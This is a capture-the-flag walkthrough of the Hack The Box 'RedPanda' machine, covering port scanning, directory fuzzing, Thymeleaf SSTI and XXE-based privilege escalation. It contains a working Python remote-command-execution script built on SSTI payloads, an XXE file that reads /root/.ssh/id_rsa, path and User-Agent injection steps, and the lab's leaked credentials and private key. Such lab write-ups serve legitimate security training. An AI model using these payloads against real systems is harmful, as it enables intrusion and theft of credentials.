---
sidebar_label: 🐼 RedPanda
description: ''
last_update:
  date: 2022/08/17
  author: Raúl Sánchez
tags:
  - Spring Boot
  - Wfuzz
  - BurpSuite
  - SSTI
  - XXE
  - SSRF
keywords: 
  - Hack The Box
  - HTB
  - HTB Writeups
  - Hacking
  - HTB Walkthrough
  - Write-up
  - Walkthrough
---

# RedPanda

![](redpanda1.png)

:::caution Disclaimer

**Disclaimer:** No flags (user/root) are shown in this **writeup**, so follow the procedures to grab the flags! Enjoy! 👽️

:::

## Setting-up the Environment

First of all, we are going to connect to the **VPN** using my custom [script](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/vpn.sh) that I have defined the path of the script in the [`.zshrc`](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) file.

```bash
❯ which vpn
vpn: aliased to sh ~/dotfiles/scripts/vpn.sh

❯ vpn htb
```

Then, start the machine and now we are going to use this [**script**](https://github.com/RaulSanchezzt/dotfiles/blob/master/scripts/htb.sh) to add the *IP* address and **hostname** of this box to the **hosts** file, **allow connections from the target** to our machine and create our working directory. 

```bash
❯ which htb
thm: aliased to sh ~/dotfiles/scripts/htb.sh
```

We will run the script and write the information of this machine.

```python
❯ htb 
[!] /etc/hosts file restored from /etc/hosts.bak
[?] Type the IP address of the box: 10.10.11.170
[?] Type the name of the box: RedPanda

[!] Hack The Box Machine
10.10.11.170 RedPanda.htb

[!] Firewall
Status: active

     To                         Action      From
     --                         ------      ----
[ 1] Anywhere                   ALLOW IN    10.10.11.170              

[!] Working directory created
[!] Initial configuration completed
```

## 1. Enumeration

Now we can simply ping to domain name of the machine to check our **VPN** connection and whether machine is alive. Sometimes machines might "Disable" ping requests from passing through the firewall. But in most case ping will be a success!

```python
❯ ping -c1 redpanda.htb
PING RedPanda.htb (10.10.11.170) 56(84) bytes of data.
64 bytes from RedPanda.htb (10.10.11.170): icmp_seq=1 ttl=63 time=89.2 ms

--- RedPanda.htb ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 89.167/89.167/89.167/0.000 ms
```

To identify which operating system is the target running. We will use the [whichSystem.py](https://github.com/RaulSanchezzt/kali-bspmw/blob/master/tools/whichSystem.py) tool.

```python
❯ whichSystem.py redpanda.htb

redpanda.htb (ttl -> 63): Linux
```

:::info
By default Linux has a TTL of 64 and Windows has 128.
:::

### 1.1 Nmap

Then, we will use the [nmap](https://nmap.org/) tool with the following parameters:

- [-p-](https://nmap.org/book/nmap-overview-and-demos.html) : scan every TCP port [0-65535].
- [--open](https://nmap.org/book/man-port-scanning-basics.html) : show only the applications that are actively accepting TCP connections.
- [-sS](https://nmap.org/book/man-port-scanning-techniques.html) : set TCP SYN scan.
- [--min-rate 5000](https://nmap.org/book/man-performance.html) : send packets as fast as or faster than the given rate.
- [-vvv](https://nmap.org/book/osdetect-usage.html#osdetect-ex-scanme1) : increase the verbosity.
- [-n](https://nmap.org/book/host-discovery-dns.html) : No DNS resolution.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- {name}.htb : Target machine.
- [-oG](https://nmap.org/book/output-formats-grepable-output.html) : Grepeable output.
- allPorts : Output file name.

```python
❯ sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn redpanda.htb -oG allPorts

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-16 16:35 CEST
Initiating SYN Stealth Scan at 16:35
Scanning redpanda.htb (10.10.11.170) [65535 ports]
Discovered open port 22/tcp on 10.10.11.170
Discovered open port 8080/tcp on 10.10.11.170
Completed SYN Stealth Scan at 16:35, 24.06s elapsed (65535 total ports)
Nmap scan report for redpanda.htb (10.10.11.170)
Host is up, received user-set (0.13s latency).
Scanned at 2022-08-16 16:35:30 CEST for 24s
Not shown: 45377 closed tcp ports (reset), 20156 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE    REASON
22/tcp   open  ssh        syn-ack ttl 63
8080/tcp open  http-proxy syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 24.17 seconds
           Raw packets sent: 119637 (5.264MB) | Rcvd: 52676 (2.107MB)
```

This is the function that I have defined in the [zsh](https://github.com/RaulSanchezzt/dotfiles/blob/master/.zshrc) configuration file to extract TCP ports.

```bash
❯ which extractPorts
extractPorts () {
    ports="$(cat $1 | grep -oP '\d{1,5}/open' | awk '{print $1}' FS='/' | xargs | tr ' ' ',')" 
    ip_address="$(cat $1 | grep -oP '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}' | sort -u | head -n 1)" 
    echo -e "\n${yellowColour}[*] Extracting information...${endColour}\n"
    echo -e "\t${grayColour}[*] IP Address:${endColour} ${greenColour} $ip_address${endColour}"
    echo -e "\t${grayColour}[*] Open ports:${endColour} ${redColour} $ports${endColour}\n"
    echo $ports | tr -d '\n' | xclip -sel clip
    echo -e "${blueColour}[*] Ports copied to clipboard${endColour}\n"
}
```

Use the command to extract the **TCP ports**.

```python
❯ extractPorts allPorts

[*] Extracting information...

    [*] IP Address:  10.10.11.170
    [*] Open ports:  22,8080

[*] Ports copied to clipboard
```

We will see the open ports on the target machine so now, we are going to use [nmap](https://nmap.org/) again using the parameters below:

- [-sV](https://nmap.org/book/man-version-detection.html) : to see the services and their version.
- [-sC](https://nmap.org/book/man-nse.html) : to performs a script scan using the default set of scripts.
- [-Pn](https://nmap.org/book/man-host-discovery.html) : No Ping.
- [-p](https://nmap.org/book/scan-methods-ip-protocol-scan.html) : to determine which IP protocols are supported by target machine.
- {name}.htb : Target machine.
- [-oN](https://nmap.org/book/output-formats-normal-output.html) : Normal output.
- targeted : Output file name.

```python
❯ nmap -sV -sC -Pn -p22,8080 redpanda.htb -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-16 16:36 CEST
Nmap scan report for redpanda.htb (10.10.11.170)
Host is up (0.048s latency).
rDNS record for 10.10.11.170: RedPanda.htb

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
8080/tcp open  http-proxy
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Tue, 16 Aug 2022 14:36:30 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en" dir="ltr">
|     <head>
|     <meta charset="utf-8">
|     <meta author="wooden_k">
|     <!--Codepen by khr2003: https://codepen.io/khr2003/pen/BGZdXw -->
|     <link rel="stylesheet" href="css/panda.css" type="text/css">
|     <link rel="stylesheet" href="css/main.css" type="text/css">
|     <title>Red Panda Search | Made with Spring Boot</title>
|     </head>
|     <body>
|     <div class='pande'>
|     <div class='ear left'></div>
|     <div class='ear right'></div>
|     <div class='whiskers left'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='whiskers right'>
|     <span></span>
|     <span></span>
|     <span></span>
|     </div>
|     <div class='face'>
|     <div class='eye
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     Content-Length: 0
|     Date: Tue, 16 Aug 2022 14:36:30 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Tue, 16 Aug 2022 14:36:30 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
|_http-title: Red Panda Search | Made with Spring Boot
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=8/16%Time=62FBAB6E%P=x86_64-pc-linux-gnu%r(Ge
SF:tRequest,690,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;charse
SF:t=UTF-8\r\nContent-Language:\x20en-US\r\nDate:\x20Tue,\x2016\x20Aug\x20
SF:2022\x2014:36:30\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20htm
SF:l>\n<html\x20lang=\"en\"\x20dir=\"ltr\">\n\x20\x20<head>\n\x20\x20\x20\
SF:x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20author=\"woode
SF:n_k\">\n\x20\x20\x20\x20<!--Codepen\x20by\x20khr2003:\x20https://codepe
SF:n\.io/khr2003/pen/BGZdXw\x20-->\n\x20\x20\x20\x20<link\x20rel=\"stylesh
SF:eet\"\x20href=\"css/panda\.css\"\x20type=\"text/css\">\n\x20\x20\x20\x2
SF:0<link\x20rel=\"stylesheet\"\x20href=\"css/main\.css\"\x20type=\"text/c
SF:ss\">\n\x20\x20\x20\x20<title>Red\x20Panda\x20Search\x20\|\x20Made\x20w
SF:ith\x20Spring\x20Boot</title>\n\x20\x20</head>\n\x20\x20<body>\n\n\x20\
SF:x20\x20\x20<div\x20class='pande'>\n\x20\x20\x20\x20\x20\x20<div\x20clas
SF:s='ear\x20left'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='ear\x20r
SF:ight'></div>\n\x20\x20\x20\x20\x20\x20<div\x20class='whiskers\x20left'>
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</div>\n\x20\x20\x20\x
SF:20\x20\x20<div\x20class='whiskers\x20right'>\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x
SF:20\x20\x20\x20\x20\x20\x20\x20<span></span>\n\x20\x20\x20\x20\x20\x20</
SF:div>\n\x20\x20\x20\x20\x20\x20<div\x20class='face'>\n\x20\x20\x20\x20\x
SF:20\x20\x20\x20<div\x20class='eye")%r(HTTPOptions,75,"HTTP/1\.1\x20200\x
SF:20\r\nAllow:\x20GET,HEAD,OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Tu
SF:e,\x2016\x20Aug\x202022\x2014:36:30\x20GMT\r\nConnection:\x20close\r\n\
SF:r\n")%r(RTSPRequest,24E,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/
SF:html;charset=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x20435
SF:\r\nDate:\x20Tue,\x2016\x20Aug\x202022\x2014:36:30\x20GMT\r\nConnection
SF::\x20close\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>H
SF:TTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x2
SF:0type=\"text/css\">body\x20{font-family:Tahoma,Arial,sans-serif;}\x20h1
SF:,\x20h2,\x20h3,\x20b\x20{color:white;background-color:#525D76;}\x20h1\x
SF:20{font-size:22px;}\x20h2\x20{font-size:16px;}\x20h3\x20{font-size:14px
SF:;}\x20p\x20{font-size:12px;}\x20a\x20{color:black;}\x20\.line\x20{heigh
SF:t:1px;background-color:#525D76;border:none;}</style></head><body><h1>HT
SF:TP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request</h1></body></html
SF:>");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.19 seconds
```

:::info
You can find the man page of nmap [here](https://nmap.org/book/toc.html).
:::

### 1.2 Web

Then we will use the [whatweb](https://www.kali.org/tools/whatweb/) tool and find out that it is built with [Spring Boot](https://spring.io/).

```
❯ whatweb http://10.10.11.170:8080
http://10.10.11.170:8080 [200 OK] Content-Language[en-US], Country[RESERVED][ZZ], HTML5, IP[10.10.11.170], Title[Red Panda Search | Made with Spring Boot]
```

In the browser we will see that it is a search engine.

![](redpanda2.png)

After testing some commands we observed that if we do not look for anything this alert about **injection attacks** appears.

![](redpanda3.png)

### 1.3 Wfuzz

Then we will use [wfuzz](https://www.kali.org/tools/wfuzz/) to search for hidden directories on the web page.

```
❯ wfuzz -c -L -t 400 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://redpanda.htb:8080/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://redpanda.htb:8080/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                     
=====================================================================

000002708:   500        0 L      1 W        86 Ch       "error"                                                                                                                     
000000171:   200        32 L     97 W       987 Ch      "stats"                                                                                                                     
000000027:   405        0 L      3 W        117 Ch      "search"                                                                                                                                                                                                                        

Total time: 731.7045
Processed Requests: 220560
Filtered Requests: 220531
Requests/sec.: 301.4331
```

In the `stats` directory we will find that there are two authors: **woodenk** and **damian**.

![](redpanda5.png)

## 2. Foothold

### 2.1 BurpSuite

We will now use [BurpSuite](https://portswigger.net/burp) to **intercept** the **requests**. And we will see that we can modify the parameter we are looking for. So we'll send it to the **Repeater**.

![](redpanda6.png)

We will use this [article](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/) to check if this site is vulnerable to **SSTI**.

![](redpanda7.png)

It is vulnerable but instead of using the `$` we will use the `*`. Now by using this [article](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#java---basic-injection) we can get more information.

![](redpanda8.png)

We will see the target's **/etc/passwd** file.

![](redpanda9.png)

We can use a [SSTI Payload Generator](https://github.com/VikasVarshney/ssti-payload) for other commands. 

```
❯ python3 ssti-payload.py
Command ==> whoami
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105))).getInputStream())}
```

Copy the payload in `BurpSuite` and you will see the **woodenk** user.

![](redpanda10.png)

We will create a **Python** script to automate this process.

```python
#!/usr/bin/python3
import requests
from cmd import Cmd
from bs4 import BeautifulSoup

class RCE(Cmd):
    prompt = "\033[1;31m$\033[1;37m "
    def decimal(self, args):
        comando = args
        decimales = []

        for i in comando:
            decimales.append(str(ord(i)))

        payload = "*{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)" % decimales[0]

        for i in decimales[1:]:
            payload += ".concat(T(java.lang.Character).toString({}))".format(i)

        payload += ").getInputStream())}"
        data = { "name": payload }
        requer = requests.post("http://10.10.11.170:8080/search", data=data)
        parser = BeautifulSoup(requer.content, 'html.parser')
        grepcm = parser.find_all("h2")[0].get_text()
        result = grepcm.replace('You searched for:','').strip()
        print(result)

    def default(self, args):
        try:
            self.decimal(args)
        except:
            print("%s: command not found" % (args))

RCE().cmdloop()
```

We run the **script** and in this way we can execute commands and receive the response as if it were a **shell**.

```
❯ python3 exploit.py
$ whoami
woodenk
$ hostname -I
10.10.11.170 dead:beef::250:56ff:feb9:9eb0
$ id
uid=1000(woodenk) gid=1001(logs) groups=1001(logs),1000(woodenk)
```

After searching through directories for a while we found **SSH credentials** in `MainController.java`.

```
$ cat /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java
conn = DriverManager.getConnection("jdbc:mysql://localhost:3306/red_panda", "woodenk", "RedPandazRule");
```

In this way we can connect via **SSH** with a proper **shell**. And we will get the **user flag**!

```
❯ ssh woodenk@redpanda.htb

Last login: Tue Aug 16 18:08:50 2022 from 10.10.14.32
woodenk@redpanda:~$ whoami
woodenk
woodenk@redpanda:~$ ls
user.txt
woodenk@redpanda:~$ cat user.txt
```

## 3. Privilege Escalation

First we will look for how to escalate privileges with the [linpeas.sh](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) tool.

```
woodenk@redpanda:~$ ./linpeas.sh
╔══════════╣ Unexpected in /opt (usually empty)
total 24
drwxr-xr-x  5 root root 4096 Jun 23 18:12 .
drwxr-xr-x 20 root root 4096 Jun 23 14:52 ..
-rwxr-xr-x  1 root root  462 Jun 23 18:12 cleanup.sh
drwxr-xr-x  3 root root 4096 Jun 14 14:35 credit-score
drwxr-xr-x  6 root root 4096 Jun 14 14:35 maven
drwxrwxr-x  5 root root 4096 Jun 14 14:35 panda_search
```

We will find some **scripts** in the` /opt` directory so we will use the [pspy64](https://github.com/DominicBreuker/pspy) tool in case there is a **scheduled** task. 

```
2022/08/17 14:05:01 CMD: UID=0    PID=4664   | sudo -u woodenk /opt/cleanup.sh 
2022/08/17 14:05:01 CMD: UID=0    PID=4663   | /bin/sh -c sudo -u woodenk /opt/cleanup.sh 
2022/08/17 14:05:01 CMD: UID=1000 PID=4665   | /bin/bash /opt/cleanup.sh 
2022/08/17 14:05:01 CMD: UID=1000 PID=4666   | /usr/bin/find /tmp -name *.xml -exec rm -rf {} ; 
2022/08/17 14:05:01 CMD: UID=1000 PID=4670   | /usr/bin/find /home/woodenk -name *.xml -exec rm -rf {} ; 
2022/08/17 14:05:01 CMD: UID=1000 PID=4676   | /usr/bin/find /tmp -name *.jpg -exec rm -rf {} ; 
2022/08/17 14:05:01 CMD: UID=1000 PID=4678   | /usr/bin/find /var/tmp -name *.jpg -exec rm -rf {} ; 
2022/08/17 14:05:01 CMD: UID=1000 PID=4680   | /usr/bin/find /home/woodenk -name *.jpg -exec rm -rf {} ;
```

This may be a clue to escalate, because why does it delete files with that **extension**?

Reviewing again the file where we find the credentials we see how it **exports** the `xml`.

```
@GetMapping(value="/export.xml", produces = MediaType.APPLICATION_OCTET_STREAM_VALUE)
  public @ResponseBody byte[] exportXML(@RequestParam(name="author", defaultValue="err") String author) throws IOException {

      System.out.println("Exporting xml of: " + author);
      if(author.equals("woodenk") || author.equals("damian"))
      {
          InputStream in = new FileInputStream("/credits/" + author + "_creds.xml");
          System.out.println(in);
          return IOUtils.toByteArray(in);
      }
      else
      {
          return IOUtils.toByteArray("Error, incorrect paramenter 'author'\n\r");
      }
  }
```

Also in the other `App.java` file we can see how it handles the **metadata**.

```
public static String getArtist(String uri) throws IOException, JpegProcessingException
{
    String fullpath = "/opt/panda_search/src/main/resources/static" + uri;
    File jpgFile = new File(fullpath);
    Metadata metadata = JpegMetadataReader.readMetadata(jpgFile);
    for(Directory dir : metadata.getDirectories())
    {
        for(Tag tag : dir.getTags())
        {
            if(tag.getTagName() == "Artist")
            {
                return tag.getDescription();
            }
        }
    }

    return "N/A";
}
```

Now it starts to make sense that it would delete files with those **extensions**. But also in the file it shows how it handles the `User-Agent`.

```
public static Map parseLog(String line) {
    String[] strings = line.split(
    Map map = new HashMap<>();
    map.put("status_code", Integer.parseInt(strings[
    map.put("ip", strings[1]);
    map.put("user_agent", strings[2]);
    map.put("uri", strings[3]);
    return map;
}
```

### 3.1 XXE - SSRF Attack

Looking at this configuration we can inject in the **"Artist"** field, a path of a malicious `xml` file. We create the **xml** file and start an **HTTP server** to upload these files to the target.

```
❯ exiftool -Artist="../home/woodenk/pwnd" kali.jpg
    1 image files updated
❯ exiftool kali.jpg
ExifTool Version Number         : 12.44
Artist                          : ../home/woodenk/pwnd

❯ vim pwnd_creds.xml
❯ python3 -m http.server 80
```

This file points to the root **id_rsa** key.

```xml
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///root/.ssh/id_rsa"> ]>
<credits>
  <author>damian</author>
  <image>
    <uri>/../../../../../../../home/woodenk/kali.jpg</uri>
    <privesc>&ent;</privesc>
    <views>0</views>
  </image>
  <totalviews>0</totalviews>
</credits>
```

We will download it from the **target** machine.

```
woodenk@redpanda:~$ wget http://10.10.14.81:80/kali.jpg
woodenk@redpanda:~$ wget http://10.10.14.81:80/pwnd_creds.xml 
```

Now we have to make a **curl** request with the format we saw in the file as `User-Agent`.

```
❯ curl http://redpanda.htb:8080 -H "User-Agent: ||/../../../../../../../home/woodenk/kali.jpg"
```

Finally export the `xml` from `/stats` so that it takes our file.

![](redpanda11.png)

Now if we check the `xml` will have the root **id_rsa** key!!

```xml
woodenk@redpanda:~$ cat pwnd_creds.xml 
<?xml version="1.0" encoding="UTF-8"?>
<!--?xml version="1.0" ?-->
<!DOCTYPE replace>
<credits>
  <author>damian</author>
  <image>
    <uri>/../../../../../../../home/woodenk/kali.jpg</uri>
    <privesc>-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQAAAJBRbb26UW29
ugAAAAtzc2gtZWQyNTUxOQAAACDeUNPNcNZoi+AcjZMtNbccSUcDUZ0OtGk+eas+bFezfQ
AAAECj9KoL1KnAlvQDz93ztNrROky2arZpP8t8UgdfLI0HvN5Q081w1miL4ByNky01txxJ
RwNRnQ60aT55qz5sV7N9AAAADXJvb3RAcmVkcGFuZGE=
-----END OPENSSH PRIVATE KEY-----</privesc>
    <views>6</views>
  </image>
  <totalviews>6</totalviews>
</credits>
```

Copy the key and connect via **SSH** with the user **root**.

```
❯ vim id_rsa
❯ chmod 600 id_rsa
❯ ssh -i id_rsa root@redpanda.htb
Last login: Wed Aug 17 13:14:05 2022 from 10.10.16.2
root@redpanda:~# whoami
root
```

Grab the **root** flag!

```
root@redpanda:~# ls
root.txt
root@redpanda:~# cat root.txt 
```

I hope you made it too, see you next timee! 🙃
